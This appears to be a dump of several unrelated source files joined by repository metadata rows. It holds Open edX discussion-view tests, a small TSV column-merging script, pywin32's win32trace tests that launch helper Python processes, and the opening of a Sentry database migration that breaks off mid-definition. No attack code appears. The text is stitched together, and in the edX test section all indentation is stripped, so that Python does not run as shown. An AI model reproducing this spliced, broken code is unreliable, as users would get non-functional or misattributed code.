'headers': ANY,
'timeout': 5
}
),
(
('put', '{prefix}/comments/518d4237b023791dca00000d/abuse_flag'.format(prefix=CS_PREFIX)),
{
'data': {'user_id': '1'},
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('get', '{prefix}/comments/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
)
]
assert_equal(call_list, mock_request.call_args_list)
assert_equal(response.status_code, 200)
def test_un_flag_comment_open(self, mock_request):
self.un_flag_comment(mock_request, False)
def test_un_flag_comment_close(self, mock_request):
self.un_flag_comment(mock_request, True)
def un_flag_comment(self, mock_request, is_closed):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"body": "this is a comment",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": is_closed,
"id": "518d4237b023791dca00000d",
"user_id": "1",
"username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [],
"type": "comment",
"endorsed": False
})
url = reverse('un_flag_abuse_for_comment', kwargs={'comment_id': '518d4237b023791dca00000d', 'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url)
assert_true(mock_request.called)
call_list = [
(
('get', '{prefix}/comments/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('put', '{prefix}/comments/518d4237b023791dca00000d/abuse_unflag'.format(prefix=CS_PREFIX)),
{
'data': {'user_id': '1'},
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('get', '{prefix}/comments/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
)
]
assert_equal(call_list, mock_request.call_args_list)
assert_equal(response.status_code, 200)
@patch("lms.lib.comment_client.utils.requests.request")
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class ViewPermissionsTestCase(UrlResetMixin, ModuleStoreTestCase, MockRequestSetupMixin):
@patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(ViewPermissionsTestCase, self).setUp()
self.password = "test password"
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create(password=self.password)
self.moderator = UserFactory.create(password=self.password)
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
CourseEnrollmentFactory(user=self.moderator, course_id=self.course.id)
self.moderator.roles.add(Role.objects.get(name="Moderator", course_id=self.course.id))
def test_pin_thread_as_student(self, mock_request):
self._set_mock_request_data(mock_request, {})
self.client.login(username=self.student.username, password=self.password)
response = self.client.post(
reverse("pin_thread", kwargs={"course_id": self.course.id.to_deprecated_string(), "thread_id": "dummy"})
)
self.assertEqual(response.status_code, 401)
def test_pin_thread_as_moderator(self, mock_request):
self._set_mock_request_data(mock_request, {})
self.client.login(username=self.moderator.username, password=self.password)
response = self.client.post(
reverse("pin_thread", kwargs={"course_id": self.course.id.to_deprecated_string(), "thread_id": "dummy"})
)
self.assertEqual(response.status_code, 200)
def test_un_pin_thread_as_student(self, mock_request):
self._set_mock_request_data(mock_request, {})
self.client.login(username=self.student.username, password=self.password)
response = self.client.post(
reverse("un_pin_thread", kwargs={"course_id": self.course.id.to_deprecated_string(), "thread_id": "dummy"})
)
self.assertEqual(response.status_code, 401)
def test_un_pin_thread_as_moderator(self, mock_request):
self._set_mock_request_data(mock_request, {})
self.client.login(username=self.moderator.username, password=self.password)
response = self.client.post(
reverse("un_pin_thread", kwargs={"course_id": self.course.id.to_deprecated_string(), "thread_id": "dummy"})
)
self.assertEqual(response.status_code, 200)
def _set_mock_request_thread_and_comment(self, mock_request, thread_data, comment_data):
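        # Route mocked comments-service calls by URL so that thread lookups and comment lookups return different payloads.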
def handle_request(*args, **kwargs):
url = args[1]
if "/threads/" in url:
return self._create_response_mock(thread_data)
elif "/comments/" in url:
return self._create_response_mock(comment_data)
else:
                raise ValueError("Bad url to mock request")
mock_request.side_effect = handle_request
def test_endorse_response_as_staff(self, mock_request):
self._set_mock_request_thread_and_comment(
mock_request,
{"type": "thread", "thread_type": "question", "user_id": str(self.student.id)},
{"type": "comment", "thread_id": "dummy"}
)
self.client.login(username=self.moderator.username, password=self.password)
response = self.client.post(
reverse("endorse_comment", kwargs={"course_id": self.course.id.to_deprecated_string(), "comment_id": "dummy"})
)
self.assertEqual(response.status_code, 200)
def test_endorse_response_as_student(self, mock_request):
self._set_mock_request_thread_and_comment(
mock_request,
{"type": "thread", "thread_type": "question", "user_id": str(self.moderator.id)},
{"type": "comment", "thread_id": "dummy"}
)
self.client.login(username=self.student.username, password=self.password)
response = self.client.post(
reverse("endorse_comment", kwargs={"course_id": self.course.id.to_deprecated_string(), "comment_id": "dummy"})
)
self.assertEqual(response.status_code, 401)
def test_endorse_response_as_student_question_author(self, mock_request):
self._set_mock_request_thread_and_comment(
mock_request,
{"type": "thread", "thread_type": "question", "user_id": str(self.student.id)},
{"type": "comment", "thread_id": "dummy"}
)
self.client.login(username=self.student.username, password=self.password)
response = self.client.post(
reverse("endorse_comment", kwargs={"course_id": self.course.id.to_deprecated_string(), "comment_id": "dummy"})
)
self.assertEqual(response.status_code, 200)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class CreateThreadUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request):
self._set_mock_request_data(mock_request, {})
request = RequestFactory().post("dummy_url", {"thread_type": "discussion", "body": text, "title": text})
request.user = self.student
request.view_name = "create_thread"
response = views.create_thread(request, course_id=self.course.id.to_deprecated_string(), commentable_id="test_commentable")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
self.assertEqual(mock_request.call_args[1]["data"]["title"], text)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class UpdateThreadUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('django_comment_client.base.views.get_discussion_categories_ids', return_value=["test_commentable"])
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request, mock_get_discussion_id_map):
self._set_mock_request_data(mock_request, {
"user_id": str(self.student.id),
"closed": False,
})
request = RequestFactory().post("dummy_url", {"body": text, "title": text, "thread_type": "question", "commentable_id": "test_commentable"})
request.user = self.student
request.view_name = "update_thread"
response = views.update_thread(request, course_id=self.course.id.to_deprecated_string(), thread_id="dummy_thread_id")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
self.assertEqual(mock_request.call_args[1]["data"]["title"], text)
self.assertEqual(mock_request.call_args[1]["data"]["thread_type"], "question")
self.assertEqual(mock_request.call_args[1]["data"]["commentable_id"], "test_commentable")
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class CreateCommentUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request):
self._set_mock_request_data(mock_request, {
"closed": False,
})
request = RequestFactory().post("dummy_url", {"body": text})
request.user = self.student
request.view_name = "create_comment"
response = views.create_comment(request, course_id=self.course.id.to_deprecated_string(), thread_id="dummy_thread_id")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class UpdateCommentUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request):
self._set_mock_request_data(mock_request, {
"user_id": str(self.student.id),
"closed": False,
})
request = RequestFactory().post("dummy_url", {"body": text})
request.user = self.student
request.view_name = "update_comment"
response = views.update_comment(request, course_id=self.course.id.to_deprecated_string(), comment_id="dummy_comment_id")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class CreateSubCommentUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request):
self._set_mock_request_data(mock_request, {
"closed": False,
"depth": 1,
})
request = RequestFactory().post("dummy_url", {"body": text})
request.user = self.student
request.view_name = "create_sub_comment"
response = views.create_sub_comment(request, course_id=self.course.id.to_deprecated_string(), comment_id="dummy_comment_id")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class UsersEndpointTestCase(ModuleStoreTestCase, MockRequestSetupMixin):
def set_post_counts(self, mock_request, threads_count=1, comments_count=1):
"""
sets up a mock response from the comments service for getting post counts for our other_user
"""
self._set_mock_request_data(mock_request, {
"threads_count": threads_count,
"comments_count": comments_count,
})
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
self.enrollment = CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
self.other_user = UserFactory.create(username="other")
CourseEnrollmentFactory(user=self.other_user, course_id=self.course.id)
def make_request(self, method='get', course_id=None, **kwargs):
course_id = course_id or self.course.id
request = getattr(RequestFactory(), method)("dummy_url", kwargs)
request.user = self.student
request.view_name = "users"
return views.users(request, course_id=course_id.to_deprecated_string())
@patch('lms.lib.comment_client.utils.requests.request')
def test_finds_exact_match(self, mock_request):
self.set_post_counts(mock_request)
response = self.make_request(username="other")
self.assertEqual(response.status_code, 200)
self.assertEqual(
json.loads(response.content)["users"],
[{"id": self.other_user.id, "username": self.other_user.username}]
)
@patch('lms.lib.comment_client.utils.requests.request')
def test_finds_no_match(self, mock_request):
self.set_post_counts(mock_request)
response = self.make_request(username="othor")
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content)["users"], [])
def test_requires_GET(self):
response = self.make_request(method='post', username="other")
self.assertEqual(response.status_code, 405)
def test_requires_username_param(self):
response = self.make_request()
self.assertEqual(response.status_code, 400)
content = json.loads(response.content)
self.assertIn("errors", content)
self.assertNotIn("users", content)
def test_course_does_not_exist(self):
course_id = SlashSeparatedCourseKey.from_deprecated_string("does/not/exist")
response = self.make_request(course_id=course_id, username="other")
self.assertEqual(response.status_code, 404)
content = json.loads(response.content)
self.assertIn("errors", content)
self.assertNotIn("users", content)
def test_requires_requestor_enrolled_in_course(self):
# unenroll self.student from the course.
self.enrollment.delete()
response = self.make_request(username="other")
self.assertEqual(response.status_code, 404)
content = json.loads(response.content)
        self.assertIn("errors", content)
        self.assertNotIn("users", content)
@patch('lms.lib.comment_client.utils.requests.request')
def test_requires_matched_user_has_forum_content(self, mock_request):
self.set_post_counts(mock_request, 0, 0)
response = self.make_request(username="other")
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content)["users"], [])
| agpl-3.0 | 164,405,407,159,866,430 | 39.188517 | 153 | 0.579589 | false |
TiedNets/TiedNets | tsv_col_adder.py | 1 | 1976 | import csv
from itertools import izip
# works for tsv files, make sure the two input files have the same number of lines
def add_cols_from_file(main_fpath, add_fpath, output_fpath):
with open(main_fpath, 'r') as main_file, open(add_fpath, 'r') as add_file, open(output_fpath, 'w') as out_file:
main_reader = csv.reader(main_file, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
add_reader = csv.reader(add_file, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
out_writer = csv.writer(out_file, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
main_header = main_reader.next()
add_header = add_reader.next()
out_header = main_header + add_header
out_writer.writerow(out_header)
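        # izip stops at the shorter of the two readers, so mismatched line counts would silently drop rows - hence the same-length requirement noted above.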
for main_row, add_row in izip(main_reader, add_reader):
out_row = main_row + add_row
out_writer.writerow(out_row)
# this function was only used once, as an alternative to the other one
def add_cols_to_file():
indep_var_vals = range(0, 61, 10)
first_instance = 0
last_instance = 60
seeds = range(0, 40)
for i in range(0, 6):
output_fpath = '/home/agostino/Documents/Simulations/test_mp/safe_cnt_col_{}.tsv'.format(i)
with open(output_fpath, 'w') as out_file:
out_writer = csv.writer(out_file, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
out_writer.writerow(['safe_nodes_count'])
for var_value in indep_var_vals:
for instance_num in range(first_instance, last_instance, 1):
for seed in seeds:
out_writer.writerow([var_value])
for i in range(0, 3):
main_fpath = '/home/agostino/Documents/Simulations/test_mp/ml_stats_{}.tsv'.format(i)
add_fpath = '/home/agostino/Documents/Simulations/test_mp/safe_cnt_col_{}.tsv'.format(i)
output_fpath = '/home/agostino/Documents/Simulations/test_mp/ml_stats_fix_{}.tsv'.format(i)
add_cols_from_file(main_fpath, add_fpath, output_fpath)
| gpl-3.0 | -3,607,733,378,828,287,500 | 46.047619 | 115 | 0.643725 | false |
JulienMcJay/eclock | windows/Python27/Lib/site-packages/pywin32-218-py2.7-win32.egg/test/test_win32trace.py | 17 | 11259 | import unittest
import win32trace
import threading
import time
import os
import sys
if __name__=='__main__':
this_file = sys.argv[0]
else:
this_file = __file__
def CheckNoOtherReaders():
win32trace.write("Hi")
time.sleep(0.05)
if win32trace.read() != "Hi":
# Reset everything so following tests still fail with this error!
win32trace.TermRead()
win32trace.TermWrite()
raise RuntimeError("An existing win32trace reader appears to be " \
"running - please stop this process and try again")
class TestInitOps(unittest.TestCase):
def setUp(self):
# clear old data
win32trace.InitRead()
win32trace.read()
win32trace.TermRead()
def tearDown(self):
try:
win32trace.TermRead()
except win32trace.error:
pass
try:
win32trace.TermWrite()
except win32trace.error:
pass
def testInitTermRead(self):
self.assertRaises(win32trace.error, win32trace.read)
win32trace.InitRead()
result = win32trace.read()
self.assertEquals(result, '')
win32trace.TermRead()
self.assertRaises(win32trace.error, win32trace.read)
win32trace.InitRead()
self.assertRaises(win32trace.error, win32trace.InitRead)
win32trace.InitWrite()
self.assertRaises(win32trace.error, win32trace.InitWrite)
win32trace.TermWrite()
win32trace.TermRead()
def testInitTermWrite(self):
self.assertRaises(win32trace.error, win32trace.write, 'Hei')
win32trace.InitWrite()
win32trace.write('Johan Galtung')
win32trace.TermWrite()
self.assertRaises(win32trace.error, win32trace.write, 'Hei')
    def testTermSemantics(self):
win32trace.InitWrite()
win32trace.write('Ta da')
# if we both Write and Read are terminated at the same time,
# we lose the data as the win32 object is closed. Note that
# if another writer is running, we do *not* lose the data - so
# test for either the correct data or an empty string
win32trace.TermWrite()
win32trace.InitRead()
self.failUnless(win32trace.read() in ['Ta da', ''])
win32trace.TermRead()
# we keep the data because we init read before terminating write
win32trace.InitWrite()
win32trace.write('Ta da')
win32trace.InitRead()
win32trace.TermWrite()
self.assertEquals('Ta da', win32trace.read())
win32trace.TermRead()
class BasicSetupTearDown(unittest.TestCase):
def setUp(self):
win32trace.InitRead()
# If any other writers are running (even if not actively writing),
# terminating the module will *not* close the handle, meaning old data
# will remain. This can cause other tests to fail.
win32trace.read()
win32trace.InitWrite()
def tearDown(self):
win32trace.TermWrite()
win32trace.TermRead()
class TestModuleOps(BasicSetupTearDown):
def testRoundTrip(self):
win32trace.write('Syver Enstad')
syverEnstad = win32trace.read()
self.assertEquals('Syver Enstad', syverEnstad)
def testRoundTripUnicode(self):
win32trace.write(u'\xa9opyright Syver Enstad')
syverEnstad = win32trace.read()
# str objects are always returned in py2k (latin-1 encoding was used
# on unicode objects)
self.assertEquals('\xa9opyright Syver Enstad', syverEnstad)
def testBlockingRead(self):
win32trace.write('Syver Enstad')
self.assertEquals('Syver Enstad', win32trace.blockingread())
def testBlockingReadUnicode(self):
win32trace.write(u'\xa9opyright Syver Enstad')
# str objects are always returned in py2k (latin-1 encoding was used
# on unicode objects)
self.assertEquals('\xa9opyright Syver Enstad', win32trace.blockingread())
def testFlush(self):
win32trace.flush()
class TestTraceObjectOps(BasicSetupTearDown):
def testInit(self):
win32trace.TermRead()
win32trace.TermWrite()
traceObject = win32trace.GetTracer()
self.assertRaises(win32trace.error, traceObject.read)
self.assertRaises(win32trace.error, traceObject.write, '')
win32trace.InitRead()
win32trace.InitWrite()
self.assertEquals('', traceObject.read())
traceObject.write('Syver')
def testFlush(self):
traceObject = win32trace.GetTracer()
traceObject.flush()
def testIsatty(self):
tracer = win32trace.GetTracer()
assert tracer.isatty() == False
def testRoundTrip(self):
traceObject = win32trace.GetTracer()
traceObject.write('Syver Enstad')
self.assertEquals('Syver Enstad', traceObject.read())
class WriterThread(threading.Thread):
def run(self):
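        # Each thread writes the digits 0..BucketCount-1; the reader tallies every digit it sees to verify that no writes were lost.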
self.writeCount = 0
for each in range(self.BucketCount):
win32trace.write(str(each))
self.writeCount = self.BucketCount
def verifyWritten(self):
return self.writeCount == self.BucketCount
class TestMultipleThreadsWriting(unittest.TestCase):
# FullBucket is the thread count
FullBucket = 50
    BucketCount = 9 # buckets must be a single digit number (i.e. less than 10)
def setUp(self):
WriterThread.BucketCount = self.BucketCount
win32trace.InitRead()
win32trace.read() # clear any old data.
win32trace.InitWrite()
CheckNoOtherReaders()
self.threads = [WriterThread() for each in range(self.FullBucket)]
self.buckets = range(self.BucketCount)
for each in self.buckets:
self.buckets[each] = 0
def tearDown(self):
win32trace.TermRead()
win32trace.TermWrite()
def areBucketsFull(self):
bucketsAreFull = True
for each in self.buckets:
assert each <= self.FullBucket, each
if each != self.FullBucket:
bucketsAreFull = False
break
return bucketsAreFull
def read(self):
while 1:
readString = win32trace.blockingread()
for ch in readString:
integer = int(ch)
count = self.buckets[integer]
assert count != -1
self.buckets[integer] = count + 1
if self.buckets[integer] == self.FullBucket:
if self.areBucketsFull():
return
def testThreads(self):
for each in self.threads:
each.start()
self.read()
for each in self.threads:
each.join()
for each in self.threads:
assert each.verifyWritten()
assert self.areBucketsFull()
class TestHugeChunks(unittest.TestCase):
# BiggestChunk is the size where we stop stressing the writer
    BiggestChunk = 2**16 # 64k should do it.
def setUp(self):
win32trace.InitRead()
win32trace.read() # clear any old data
win32trace.InitWrite()
def testHugeChunks(self):
data = "*" * 1023 + "\n"
while len(data) <= self.BiggestChunk:
win32trace.write(data)
data = data + data
# If we made it here, we passed.
def tearDown(self):
win32trace.TermRead()
win32trace.TermWrite()
import win32event
import win32process
class TraceWriteProcess:
def __init__(self, threadCount):
self.exitCode = -1
self.threadCount = threadCount
def start(self):
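        # Launch a child python process that re-runs this test file with /run_test_process, so the writes really do come from another process.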
procHandle, threadHandle, procId, threadId = win32process.CreateProcess(
None, # appName
'python.exe "%s" /run_test_process %s %s' % (this_file,
self.BucketCount,
self.threadCount),
None, # process security
None, # thread security
0, # inherit handles
win32process.NORMAL_PRIORITY_CLASS,
None, # new environment
None, # Current directory
win32process.STARTUPINFO(), # startup info
)
self.processHandle = procHandle
def join(self):
win32event.WaitForSingleObject(self.processHandle,
win32event.INFINITE)
self.exitCode = win32process.GetExitCodeProcess(self.processHandle)
def verifyWritten(self):
return self.exitCode == 0
class TestOutofProcess(unittest.TestCase):
BucketCount = 9
FullBucket = 50
def setUp(self):
win32trace.InitRead()
TraceWriteProcess.BucketCount = self.BucketCount
self.setUpWriters()
self.buckets = range(self.BucketCount)
for each in self.buckets:
self.buckets[each] = 0
def tearDown(self):
win32trace.TermRead()
def setUpWriters(self):
self.processes = []
# 5 processes, quot threads in each process
quot, remainder = divmod(self.FullBucket, 5)
for each in range(5):
self.processes.append(TraceWriteProcess(quot))
if remainder:
self.processes.append(TraceWriteProcess(remainder))
def areBucketsFull(self):
bucketsAreFull = True
for each in self.buckets:
assert each <= self.FullBucket, each
if each != self.FullBucket:
bucketsAreFull = False
break
return bucketsAreFull
def read(self):
while 1:
readString = win32trace.blockingread()
for ch in readString:
integer = int(ch)
count = self.buckets[integer]
assert count != -1
self.buckets[integer] = count + 1
if self.buckets[integer] == self.FullBucket:
if self.areBucketsFull():
return
def testProcesses(self):
for each in self.processes:
each.start()
self.read()
for each in self.processes:
each.join()
for each in self.processes:
assert each.verifyWritten()
assert self.areBucketsFull()
def _RunAsTestProcess():
# Run as an external process by the main tests.
WriterThread.BucketCount = int(sys.argv[2])
threadCount = int(sys.argv[3])
threads = [WriterThread() for each in range(threadCount)]
win32trace.InitWrite()
for t in threads:
t.start()
for t in threads:
t.join()
for t in threads:
if not t.verifyWritten():
sys.exit(-1)
if __name__ == '__main__':
if sys.argv[1:2]==["/run_test_process"]:
_RunAsTestProcess()
sys.exit(0)
# If some other win32traceutil reader is running, these tests fail
# badly (as the other reader sometimes sees the output!)
win32trace.InitRead()
win32trace.InitWrite()
CheckNoOtherReaders()
# reset state so test env is back to normal
win32trace.TermRead()
win32trace.TermWrite()
unittest.main()
| gpl-2.0 | 3,742,841,848,567,057,400 | 31.729651 | 81 | 0.602984 | false |
alex/sentry | sentry/migrations/0036_auto__chg_field_option_value__chg_field_projectoption_value.py | 7 | 15105 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Option.value'
db.alter_column('sentry_option', 'value', self.gf('django.db.models.fields.TextField')())
# Changing field 'ProjectOption.value'
db.alter_column('sentry_projectoptions', 'value', self.gf('django.db.models.fields.TextField')())
def backwards(self, orm):
# Changing field 'Option.value'
db.alter_column('sentry_option', 'value', self.gf('django.db.models.fields.CharField')(max_length=200))
# Changing field 'ProjectOption.value'
db.alter_column('sentry_projectoptions', 'value', self.gf('django.db.models.fields.CharField')(max_length=200))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['auth.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key', 'value'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
